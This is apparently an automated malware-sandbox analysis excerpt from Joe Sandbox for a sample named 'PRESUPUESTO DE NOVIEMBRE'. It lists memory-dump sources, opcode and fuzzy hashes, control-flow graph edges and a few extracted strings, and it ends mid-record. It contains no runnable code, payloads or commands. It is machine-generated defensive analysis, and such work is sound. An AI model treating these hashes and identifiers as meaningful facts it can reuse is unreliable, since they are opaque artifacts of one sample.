                                                                                              • Opcode Fuzzy Hash: 3b4f772ff918ac98d3fb7278d26824d5f97b8ab527a6d92bc67f8184522230c9
                                                                                              • Instruction Fuzzy Hash: 1F61C374E016089FEB58DFAAD984A9EFBF2BF89300F14C169E418AB365DB345845CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: e5f2d23209ef7050d8bd2d2910b2616d899b34f5ae7e46da02ed33fd2aacb137
                                                                                              • Instruction ID: 8f4c8ecdc5bb0583f6acdc1d29c8c2b8000be6354aa10326918f72e0b048134e
                                                                                              • Opcode Fuzzy Hash: e5f2d23209ef7050d8bd2d2910b2616d899b34f5ae7e46da02ed33fd2aacb137
                                                                                              • Instruction Fuzzy Hash: 3261B274E016089FEB18DFAAD984A9DFBF2BF89300F14C469E418AB365DB345845CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 057337583957f021dc7954cd29649aabb37b7f73fc279192c1ad85f26febd848
                                                                                              • Instruction ID: 6f329a356ea18a9a293f0b0aee5460cdedba0fb1fa3949d845227d91bcddb83f
                                                                                              • Opcode Fuzzy Hash: 057337583957f021dc7954cd29649aabb37b7f73fc279192c1ad85f26febd848
                                                                                              • Instruction Fuzzy Hash: 1461B474E016089FEB18DFAAD984A9DBBF2BF89300F14C069E418AB365DB749945CF50
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: PH_q$PH_q
                                                                                              • API String ID: 0-3760492949
                                                                                              • Opcode ID: 3f0510a560d9c57a3e909724b3242a28f5a9b7f1202d09764fecff4aeefcf1a2
                                                                                              • Instruction ID: 42e8ebb65379ac3b511f8a07a4d65e56f8be1924985c90757b2926f6ba1f1565
                                                                                              • Opcode Fuzzy Hash: 3f0510a560d9c57a3e909724b3242a28f5a9b7f1202d09764fecff4aeefcf1a2
                                                                                              • Instruction Fuzzy Hash: BC61C274E016489FEB18DFAAD984A9DFBF2BF88300F24C569E418AB365DB345845CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3756958468.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_5c10000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 22ecd65463c9c1c65f7d77f50c7dc6cbd5adaf69ec98eba48bdd7e644352d525
                                                                                              • Instruction ID: cd593f1ab8639733f835ec1fe3914e663b2221b65ff76c74f7e5d7923c30791c
                                                                                              • Opcode Fuzzy Hash: 22ecd65463c9c1c65f7d77f50c7dc6cbd5adaf69ec98eba48bdd7e644352d525
                                                                                              • Instruction Fuzzy Hash: B1F1F174E01218CFDB14DFA9C894B9DBBB2BF89304F14C5A9E808AB355DB74A985CF50
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aff626e26804a35fa848dcd88771935d5493532ce2a5334b309f4f39eead67ff
                                                                                              • Instruction ID: 51b2b7b5628cb8848c6bd4670045bc90c99598a254df9d98c08b415611f923ce
                                                                                              • Opcode Fuzzy Hash: aff626e26804a35fa848dcd88771935d5493532ce2a5334b309f4f39eead67ff
                                                                                              • Instruction Fuzzy Hash: 7151A574E01608DFDB18DFAAD994A9DBBB2FF89300F248429E815BB3A4DB345845CF14
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c2008cab9a0a4142ae0df10def9a099bff1d6611036992d9328d8f7cc7d7b678
                                                                                              • Instruction ID: a7d75ab583018f527cb5eeeb331bc3af1bdea31b09b430eae8635d50850a3c7f
                                                                                              • Opcode Fuzzy Hash: c2008cab9a0a4142ae0df10def9a099bff1d6611036992d9328d8f7cc7d7b678
                                                                                              • Instruction Fuzzy Hash: 7A51B674E01608DFEB18DFAAD954A9DBBB2FF89300F248429E815BB3A4DB345845CF14

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 0 3007700-3007725 1 3007b54-3007b58 0->1 2 300772b-300774e 0->2 3 3007b71-3007b7f 1->3 4 3007b5a-3007b6e 1->4 11 3007754-3007761 2->11 12 30077fc-3007800 2->12 9 3007bf0-3007c05 3->9 10 3007b81-3007b96 3->10 17 3007c07-3007c0a 9->17 18 3007c0c-3007c19 9->18 19 3007b98-3007b9b 10->19 20 3007b9d-3007baa 10->20 24 3007770 11->24 25 3007763-300776e 11->25 15 3007802-3007810 12->15 16 3007848-3007851 12->16 15->16 36 3007812-300782d 15->36 21 3007c67 16->21 22 3007857-3007861 16->22 26 3007c1b-3007c56 17->26 18->26 27 3007bac-3007bed 19->27 20->27 30 3007c6c-3007c83 21->30 22->1 28 3007867-3007870 22->28 31 3007772-3007774 24->31 25->31 70 3007c5d-3007c64 26->70 34 3007872-3007877 28->34 35 300787f-300788b 28->35 31->12 38 300777a-30077dc 31->38 34->35 35->30 41 3007891-3007897 35->41 57 300783b 36->57 58 300782f-3007839 36->58 82 30077e2-30077f9 38->82 83 30077de 38->83 43 300789d-30078ad 41->43 44 3007b3e-3007b42 41->44 55 30078c1-30078c3 43->55 56 30078af-30078bf 43->56 44->21 47 3007b48-3007b4e 44->47 47->1 47->28 59 30078c6-30078cc 55->59 56->59 60 300783d-300783f 57->60 58->60 59->44 63 30078d2-30078e1 59->63 60->16 64 3007841 60->64 68 30078e7 63->68 69 300798f-30079ba call 3007538 * 2 63->69 64->16 72 30078ea-30078fb 68->72 86 30079c0-30079c4 69->86 87 3007aa4-3007abe 69->87 72->30 75 3007901-3007913 72->75 75->30 77 3007919-3007931 75->77 140 3007933 call 30080d8 77->140 141 3007933 call 30080c9 77->141 81 3007939-3007949 81->44 85 300794f-3007952 81->85 82->12 83->82 88 3007954-300795a 85->88 89 300795c-300795f 85->89 86->44 91 30079ca-30079ce 86->91 87->1 109 3007ac4-3007ac8 87->109 88->89 92 3007965-3007968 88->92 89->21 89->92 94 30079d0-30079dd 91->94 95 30079f6-30079fc 91->95 96 3007970-3007973 92->96 97 300796a-300796e 92->97 112 30079ec 94->112 113 30079df-30079ea 94->113 99 3007a37-3007a3d 95->99 100 30079fe-3007a02 95->100 96->21 98 3007979-300797d 96->98 97->96 97->98 98->21 101 3007983-3007989 98->101 103 3007a49-3007a4f 99->103 104 3007a3f-3007a43 99->104 100->99 102 3007a04-3007a0d 100->102 101->69 101->72 107 3007a1c-3007a32 102->107 108 3007a0f-3007a14 102->108 110 3007a51-3007a55 103->110 111 3007a5b-3007a5d 103->111 104->70 104->103 107->44 108->107 117 3007b04-3007b08 109->117 118 3007aca-3007ad4 call 30063e0 109->118 110->44 110->111 114 3007a92-3007a94 111->114 115 3007a5f-3007a68 111->115 116 30079ee-30079f0 112->116 113->116 114->44 123 3007a9a-3007aa1 114->123 121 3007a77-3007a8d 115->121 122 3007a6a-3007a6f 115->122 116->44 116->95 117->70 125 3007b0e-3007b12 117->125 118->117 128 3007ad6-3007aeb 118->128 121->44 122->121 125->70 127 3007b18-3007b25 125->127 131 3007b34 127->131 132 3007b27-3007b32 127->132 128->117 137 3007aed-3007b02 128->137 134 3007b36-3007b38 131->134 132->134 134->44 134->70 137->1 137->117 140->81 141->81
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (o_q$(o_q$(o_q$(o_q$(o_q$(o_q$,cq$,cq
                                                                                              • API String ID: 0-3630396145
                                                                                              • Opcode ID: 419e04f92721ad50a3f3350736156eff08508160fbbbfd43c89285ce7a03ebbc
                                                                                              • Instruction ID: cac67b4186a0eb98fab80d1aaf673daaa6feb8f1c08af16313e7d0012de9bf8d
                                                                                              • Opcode Fuzzy Hash: 419e04f92721ad50a3f3350736156eff08508160fbbbfd43c89285ce7a03ebbc
                                                                                              • Instruction Fuzzy Hash: CB126930A016099FDB14CF68C984A9EBBF6FF89714F1485A9E4499B3A1D734FD41CB90

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 661 30076f1-3007725 662 3007b54-3007b58 661->662 663 300772b-300774e 661->663 664 3007b71-3007b7f 662->664 665 3007b5a-3007b6e 662->665 672 3007754-3007761 663->672 673 30077fc-3007800 663->673 670 3007bf0-3007c05 664->670 671 3007b81-3007b96 664->671 678 3007c07-3007c0a 670->678 679 3007c0c-3007c19 670->679 680 3007b98-3007b9b 671->680 681 3007b9d-3007baa 671->681 685 3007770 672->685 686 3007763-300776e 672->686 676 3007802-3007810 673->676 677 3007848-3007851 673->677 676->677 697 3007812-300782d 676->697 682 3007c67 677->682 683 3007857-3007861 677->683 687 3007c1b-3007c56 678->687 679->687 688 3007bac-3007bed 680->688 681->688 691 3007c6c-3007c83 682->691 683->662 689 3007867-3007870 683->689 692 3007772-3007774 685->692 686->692 731 3007c5d-3007c64 687->731 695 3007872-3007877 689->695 696 300787f-300788b 689->696 692->673 699 300777a-30077dc 692->699 695->696 696->691 702 3007891-3007897 696->702 718 300783b 697->718 719 300782f-3007839 697->719 743 30077e2-30077f9 699->743 744 30077de 699->744 704 300789d-30078ad 702->704 705 3007b3e-3007b42 702->705 716 30078c1-30078c3 704->716 717 30078af-30078bf 704->717 705->682 708 3007b48-3007b4e 705->708 708->662 708->689 720 30078c6-30078cc 716->720 717->720 721 300783d-300783f 718->721 719->721 720->705 724 30078d2-30078e1 720->724 721->677 725 3007841 721->725 729 30078e7 724->729 730 300798f-30079ba call 3007538 * 2 724->730 725->677 733 30078ea-30078fb 729->733 747 30079c0-30079c4 730->747 748 3007aa4-3007abe 730->748 733->691 736 3007901-3007913 733->736 736->691 738 3007919-3007931 736->738 801 3007933 call 30080d8 738->801 802 3007933 call 30080c9 738->802 742 3007939-3007949 742->705 746 300794f-3007952 742->746 743->673 744->743 749 3007954-300795a 746->749 750 300795c-300795f 746->750 747->705 752 30079ca-30079ce 747->752 748->662 770 3007ac4-3007ac8 748->770 749->750 753 3007965-3007968 749->753 750->682 750->753 755 30079d0-30079dd 752->755 756 30079f6-30079fc 752->756 757 3007970-3007973 753->757 758 300796a-300796e 753->758 773 30079ec 755->773 774 30079df-30079ea 755->774 760 3007a37-3007a3d 756->760 761 30079fe-3007a02 756->761 757->682 759 3007979-300797d 757->759 758->757 758->759 759->682 762 3007983-3007989 759->762 764 3007a49-3007a4f 760->764 765 3007a3f-3007a43 760->765 761->760 763 3007a04-3007a0d 761->763 762->730 762->733 768 3007a1c-3007a32 763->768 769 3007a0f-3007a14 763->769 771 3007a51-3007a55 764->771 772 3007a5b-3007a5d 764->772 765->731 765->764 768->705 769->768 778 3007b04-3007b08 770->778 779 3007aca-3007ad4 call 30063e0 770->779 771->705 771->772 775 3007a92-3007a94 772->775 776 3007a5f-3007a68 772->776 777 30079ee-30079f0 773->777 774->777 775->705 784 3007a9a-3007aa1 775->784 782 3007a77-3007a8d 776->782 783 3007a6a-3007a6f 776->783 777->705 777->756 778->731 786 3007b0e-3007b12 778->786 779->778 789 3007ad6-3007aeb 779->789 782->705 783->782 786->731 788 3007b18-3007b25 786->788 792 3007b34 788->792 793 3007b27-3007b32 788->793 789->778 798 3007aed-3007b02 789->798 795 3007b36-3007b38 792->795 793->795 795->705 795->731 798->662 798->778 801->742 802->742
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: (o_q$(o_q$(o_q$(o_q
                                                                                              • API String ID: 0-3600592161
                                                                                              • Opcode ID: b2e0f274c540ad5e36e4aac9d4e87d809f77ce4f7c303746227aff27c7e32437
                                                                                              • Instruction ID: ea03b734234affc677156c1da5b3c090c6dd6da5e75add13e201863f461aec39
                                                                                              • Opcode Fuzzy Hash: b2e0f274c540ad5e36e4aac9d4e87d809f77ce4f7c303746227aff27c7e32437
                                                                                              • Instruction Fuzzy Hash: BCC15C30A012099FDB14CF69C984AAEBBF6FF88704F148599E859AB3A1D734FD41CB50

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1980 3009a20-3009a31 1981 3009a37-3009a3a 1980->1981 1982 3009adb 1980->1982 1981->1982 1983 3009a40-3009a58 1981->1983 1984 3009ae0-3009b19 1982->1984 1983->1982 1991 3009a5e-3009a62 1983->1991 1987 3009b56 1984->1987 1988 3009b1b-3009b21 1984->1988 1990 3009b58-3009b5f 1987->1990 1992 3009b24-3009b26 1988->1992 1993 3009a64 1991->1993 1994 3009a86-3009a8c 1991->1994 1995 3009b65-3009b99 1992->1995 1996 3009b28-3009b31 1992->1996 1997 3009a67-3009a6a 1993->1997 1994->1982 1998 3009a8e-3009a90 1994->1998 2008 3009bf9-3009c06 1995->2008 2009 3009b9b-3009ba1 1995->2009 1999 3009b33-3009b43 1996->1999 2000 3009b45-3009b4f 1996->2000 1997->1984 2001 3009a6c-3009a78 1997->2001 2003 3009a92 1998->2003 2004 3009ab4-3009abb 1998->2004 1999->1990 2005 3009b60 2000->2005 2006 3009b51-3009b54 2000->2006 2001->1982 2007 3009a7a-3009a80 2001->2007 2010 3009a95-3009a98 2003->2010 2004->1984 2012 3009abd-3009ac6 2004->2012 2005->1995 2006->1987 2006->1992 2007->1982 2014 3009a82-3009a84 2007->2014 2013 3009c08-3009c0f 2008->2013 2016 3009ba3-3009baf 2009->2016 2017 3009c17-3009c51 2009->2017 2010->1984 2015 3009a9a-3009aa6 2010->2015 2012->1982 2018 3009ac8-3009ad1 2012->2018 2014->1994 2014->1997 2015->1982 2020 3009aa8-3009aae 2015->2020 2021 3009bb1-3009bbb 2016->2021 2022 3009be8-3009bf2 2016->2022 2067 3009c53 call 3009b70 2017->2067 2068 3009c53 call 3009a10 2017->2068 2069 3009c53 call 3009a20 2017->2069 2018->1982 2019 3009ad3-3009ada 2018->2019 2020->1982 2025 3009ab0-3009ab2 2020->2025 2021->2022 2023 3009bbd-3009be6 2021->2023 2026 3009c12 2022->2026 2027 3009bf4-3009bf7 2022->2027 2023->2013 2025->2004 2025->2010 2026->2017 2027->2008 2027->2009 2029 3009c59-3009c60 2030 3009c62-3009c67 2029->2030 2031 3009c6c-3009c8c 2029->2031 2033 3009d35-3009d3c 2030->2033 2035 3009cc7-3009cc9 2031->2035 2036 3009c8e-3009c90 2031->2036 2037 3009d30 2035->2037 2038 3009ccb-3009cd1 2035->2038 2039 3009c92-3009c97 2036->2039 2040 3009c9f-3009ca6 2036->2040 2037->2033 2038->2037 2043 3009cd3-3009cee 2038->2043 2039->2040 2041 3009cac-3009cc5 2040->2041 2042 3009d3f-3009d6b call 3009620 2040->2042 2041->2033 2054 3009d79-3009d82 call 3009620 2042->2054 2055 3009d6d-3009d77 2042->2055 2048 3009cf0-3009cf2 2043->2048 2049 3009d25-3009d27 2043->2049 2052 3009d01-3009d08 2048->2052 2053 3009cf4-3009cf9 2048->2053 2049->2037 2050 3009d29-3009d2e 2049->2050 2050->2033 2052->2042 2056 3009d0a-3009d23 2052->2056 2053->2052 2061 3009d90-3009d99 2054->2061 2062 3009d84-3009d8e 2054->2062 2055->2054 2056->2033 2064 3009da4-3009dcd 2061->2064 2062->2061 2067->2029 2068->2029 2069->2029
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 4'_q$4'_q
                                                                                              • API String ID: 0-531570531
                                                                                              • Opcode ID: 2af057d29f5f3e86e2116f0fda36144058b2a0f3077f0ddb19cd888274df1070
                                                                                              • Instruction ID: ee18136b4fd6efdb5948b0efe67d8b2bbbb5b12c3917044f8a16cb65c7cdbd01
                                                                                              • Opcode Fuzzy Hash: 2af057d29f5f3e86e2116f0fda36144058b2a0f3077f0ddb19cd888274df1070
                                                                                              • Instruction Fuzzy Hash: 72C1F9316026059FE714CF69C880A6ABBFAFF85310F18C566E819DB3A6D731ED41C7A1

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2070 3005f38-3005f5a 2071 3005f70-3005f7b 2070->2071 2072 3005f5c-3005f60 2070->2072 2075 3005f81-3005f83 2071->2075 2076 3006023-300604f 2071->2076 2073 3005f62-3005f6e 2072->2073 2074 3005f88-3005f8f 2072->2074 2073->2071 2073->2074 2078 3005f91-3005f98 2074->2078 2079 3005faf-3005fb8 2074->2079 2077 300601b-3006020 2075->2077 2083 3006056-3006098 2076->2083 2078->2079 2081 3005f9a-3005fa5 2078->2081 2154 3005fba call 3005f38 2079->2154 2155 3005fba call 3005f29 2079->2155 2081->2083 2084 3005fab-3005fad 2081->2084 2082 3005fc0-3005fc2 2085 3005fc4-3005fc8 2082->2085 2086 3005fca-3005fd2 2082->2086 2102 300609a-30060ae 2083->2102 2103 30060cb-30060cf 2083->2103 2084->2077 2085->2086 2088 3005fe5-3005ff6 2085->2088 2089 3005fe1-3005fe3 2086->2089 2090 3005fd4-3005fd9 2086->2090 2156 3005ff9 call 30069a0 2088->2156 2157 3005ff9 call 30069b0 2088->2157 2089->2077 2090->2089 2093 3005fff-3006004 2096 3006006-300600f 2093->2096 2097 3006019 2093->2097 2152 3006011 call 300aef4 2096->2152 2153 3006011 call 300afad 2096->2153 2097->2077 2099 3006017 2099->2077 2104 30060b0-30060b6 2102->2104 2105 30060bd-30060c1 2102->2105 2106 30060d2-30060d9 2103->2106 2107 3006163-3006165 2103->2107 2104->2105 2105->2103 2108 30060e9-30060f6 2106->2108 2109 30060da-30060e7 2106->2109 2150 3006167 call 3006300 2107->2150 2151 3006167 call 30062f0 2107->2151 2115 30060f8-3006102 2108->2115 2109->2115 2110 300616d-3006173 2111 3006175-300617b 2110->2111 2112 300617f-3006186 2110->2112 2116 30061e1-3006240 2111->2116 2117 300617d 2111->2117 2120 3006104-3006113 2115->2120 2121 300612f-3006133 2115->2121 2129 3006247-300625b 2116->2129 2117->2112 2132 3006123-300612d 2120->2132 2133 3006115-300611c 2120->2133 2122 3006135-300613b 2121->2122 2123 300613f-3006143 2121->2123 2126 3006189-30061da 2122->2126 2127 300613d 2122->2127 2123->2112 2128 3006145-3006149 2123->2128 2126->2116 2127->2112 2128->2129 2130 300614f-3006161 2128->2130 2130->2112 2132->2121 2133->2132 2150->2110 2151->2110 2152->2099 2153->2099 2154->2082 2155->2082 2156->2093 2157->2093
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Hcq$Hcq
                                                                                              • API String ID: 0-4088181183
                                                                                              • Opcode ID: 37920109b71d4c645981ab86f819c323ffd8b67e7d4f1a6481c08c6abcf6407b
                                                                                              • Instruction ID: 9b864e4858f6a73c2728d863fcdf5aeafd6e036348c04d8470d1bec84f0ab991
                                                                                              • Opcode Fuzzy Hash: 37920109b71d4c645981ab86f819c323ffd8b67e7d4f1a6481c08c6abcf6407b
                                                                                              • Instruction Fuzzy Hash: 4A91AD307042198FEB15DF28C894A6E7BF7EB89300F188869E4468B3E5DF768C41CB91

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 2158 3006498-30064a5 2159 30064a7-30064ab 2158->2159 2160 30064ad-30064af 2158->2160 2159->2160 2161 30064b4-30064bf 2159->2161 2162 30066c0-30066c7 2160->2162 2163 30064c5-30064cc 2161->2163 2164 30066c8 2161->2164 2165 3006661-3006667 2163->2165 2166 30064d2-30064e1 2163->2166 2168 30066cd-30066e0 2164->2168 2169 3006669-300666b 2165->2169 2170 300666d-3006671 2165->2170 2167 30064e7-30064f6 2166->2167 2166->2168 2176 30064f8-30064fb 2167->2176 2177 300650b-300650e 2167->2177 2179 30066e2-3006705 2168->2179 2180 3006718-300671a 2168->2180 2169->2162 2171 3006673-3006679 2170->2171 2172 30066be 2170->2172 2171->2164 2174 300667b-300667e 2171->2174 2172->2162 2174->2164 2178 3006680-3006695 2174->2178 2183 300651a-3006520 2176->2183 2184 30064fd-3006500 2176->2184 2177->2183 2185 3006510-3006513 2177->2185 2204 3006697-300669d 2178->2204 2205 30066b9-30066bc 2178->2205 2194 3006707-300670c 2179->2194 2195 300670e-3006712 2179->2195 2181 300671c-300672e 2180->2181 2182 300672f-3006736 2180->2182 2186 3006522-3006528 2183->2186 2187 3006538-3006555 2183->2187 2188 3006601-3006607 2184->2188 2189 3006506 2184->2189 2190 3006515 2185->2190 2191 3006566-300656c 2185->2191 2196 300652a 2186->2196 2197 300652c-3006536 2186->2197 2232 300655e-3006561 2187->2232 2199 3006609-300660f 2188->2199 2200 300661f-3006629 2188->2200 2201 300662c-3006639 2189->2201 2190->2201 2202 3006584-3006596 2191->2202 2203 300656e-3006574 2191->2203 2194->2180 2195->2180 2196->2187 2197->2187 2209 3006611 2199->2209 2210 3006613-300661d 2199->2210 2200->2201 2219 300663b-300663f 2201->2219 2220 300664d-300664f 2201->2220 2221 30065a6-30065c9 2202->2221 2222 3006598-30065a4 2202->2222 2211 3006576 2203->2211 2212 3006578-3006582 2203->2212 2206 30066af-30066b2 2204->2206 2207 300669f-30066ad 2204->2207 2205->2162 2206->2164 2215 30066b4-30066b7 2206->2215 2207->2164 2207->2206 2209->2200 2210->2200 2211->2202 2212->2202 2215->2204 2215->2205 2219->2220 2226 3006641-3006645 2219->2226 2227 3006653-3006656 2220->2227 2221->2164 2236 30065cf-30065d2 2221->2236 2233 30065f1-30065ff 2222->2233 2226->2164 2228 300664b 2226->2228 2227->2164 2229 3006658-300665b 2227->2229 2228->2227 2229->2165 2229->2166 2232->2201 2233->2201 2236->2164 2237 30065d8-30065ea 2236->2237 2237->2233
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ,cq$,cq
                                                                                              • API String ID: 0-2927840315
                                                                                              • Opcode ID: 3e930fe80e744acfb26ec0f297bc60889e454b336a0feb4d72679375b42c6bc3
                                                                                              • Instruction ID: 3f9b3148a519dc8558144c2a0ffff60b82d838385527277b42505ca66fcb3e94
                                                                                              • Opcode Fuzzy Hash: 3e930fe80e744acfb26ec0f297bc60889e454b336a0feb4d72679375b42c6bc3
                                                                                              • Instruction Fuzzy Hash: 3D818134A0250ACFEB58CF69C48496EBBF7FF89210F188569D405DB3A4DB32E851CB51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Xcq$Xcq
                                                                                              • API String ID: 0-1149048318
                                                                                              • Opcode ID: af8bc5ddb546c302171315941d8c16c47014c2cba07910afe8d6b06355c424aa
                                                                                              • Instruction ID: a66e72dccbc080679bee2428f88f4f34d3e3c78bb005b82940da1886d8ade303
                                                                                              • Opcode Fuzzy Hash: af8bc5ddb546c302171315941d8c16c47014c2cba07910afe8d6b06355c424aa
                                                                                              • Instruction Fuzzy Hash: B431E639B022298BFF5E856AA99427EA5EAFBC4240F1844BED827C73C0DF758C458651
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $_q$$_q
                                                                                              • API String ID: 0-458585787
                                                                                              • Opcode ID: a2af644b81e085e2b1876707ab1b46edfbec4d14b4f886222a19c301d3d254ae
                                                                                              • Instruction ID: b66d50eeb653e5da78f6183cd7f12fc197b5ccfd9eeb6b60349718663d9e1fee
                                                                                              • Opcode Fuzzy Hash: a2af644b81e085e2b1876707ab1b46edfbec4d14b4f886222a19c301d3d254ae
                                                                                              • Instruction Fuzzy Hash: E43184303111158FEB29DB39C89463E7BABBF84710F1889A6F116CB2D2EE29DC81C755
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_3000000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: LR_q
                                                                                              • API String ID: 0-2241839734
                                                                                              • Opcode ID: 2ef366916da371760b86f57ddef20abbeddf16c14deb9cf7de4520d9c21ee3eb
                                                                                              • Instruction ID: ae431c2009df8438afc094686e4e2aedbe6ce49702dcffd19f823ab851653a8a
                                                                                              • Opcode Fuzzy Hash: 2ef366916da371760b86f57ddef20abbeddf16c14deb9cf7de4520d9c21ee3eb
                                                                                              • Instruction Fuzzy Hash: 4732D77491021ADFCB64DF25EA85A8DBBB1FF48301F1091A5E809E7368DB396E95CF40
                                                                                              APIs
                                                                                              • LdrInitializeThunk.NTDLL(00000000), ref: 05C19A6E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3756958468.0000000005C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C10000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_5_2_5c10000_PRESUPUESTO DE NOVIEMBRE.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: 09e89db17b7cba9952f74d0511873fdb2cff0ba51624d04a491f36ee72410503
                                                                                              • Instruction ID: d2c73c4c1b03589078d74c82cd210bdd6064b56676998974c4efbcfb2823cd50
                                                                                              • Opcode Fuzzy Hash: 09e89db17b7cba9952f74d0511873fdb2cff0ba51624d04a491f36ee72410503
                                                                                              • Instruction Fuzzy Hash: 61117974E052098FDB08CFA9D8A4EADBBB6FF89304F148965E804A7241DB70A945DB64
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000005.00000002.3750021371.0000000003000000.00000040.00000800.00020000.00000000.sdmp, Offset: 03000000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
